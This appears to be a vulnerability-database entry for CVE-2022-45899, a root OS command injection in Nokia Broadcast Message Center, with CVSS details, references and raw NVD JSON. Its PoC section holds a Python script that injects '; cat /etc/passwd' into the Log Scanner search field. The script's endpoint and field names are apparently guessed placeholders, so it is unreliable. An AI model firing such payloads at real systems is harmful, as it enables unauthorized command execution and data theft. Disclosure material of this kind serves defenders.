CVE-2022-45899

Description

Nokia Broadcast Message Center (BMC) before 13.1 allows an unauthenticated remote attacker to do OS command injection as root via shell metacharacters in the Log Scanner Search Pattern field.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Nokia Broadcast Message Center (BMC) < 13.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example, replace with actual vulnerable endpoint)
target_url = "http://target-bmc-ip/log_scanner"

# Malicious payload to inject OS command
# Payload attempts to read /etc/passwd using a semicolon to break the command
payload = "; cat /etc/passwd"

data = {
    "search_pattern": payload,
    "action": "search"
}

try:
    response = requests.post(target_url, data=data, timeout=5)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-45899
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-45899
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-45899/
[4] VulDB https://vuldb.com/cve/CVE-2022-45899
[5] https://nokia.com
[6] https://www.exploit-db.com/exploits/51896
[7] https://www.exploit-db.com/exploits/51896

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-45899", "sourceIdentifier": "[email protected]", "published": "2026-05-08T05:16:09.183", "lastModified": "2026-05-08T16:02:14.343", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nokia Broadcast Message Center (BMC) before 13.1 allows an unauthenticated remote attacker to do OS command injection as root via shell metacharacters in the Log Scanner Search Pattern field."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://nokia.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51896", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51896", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}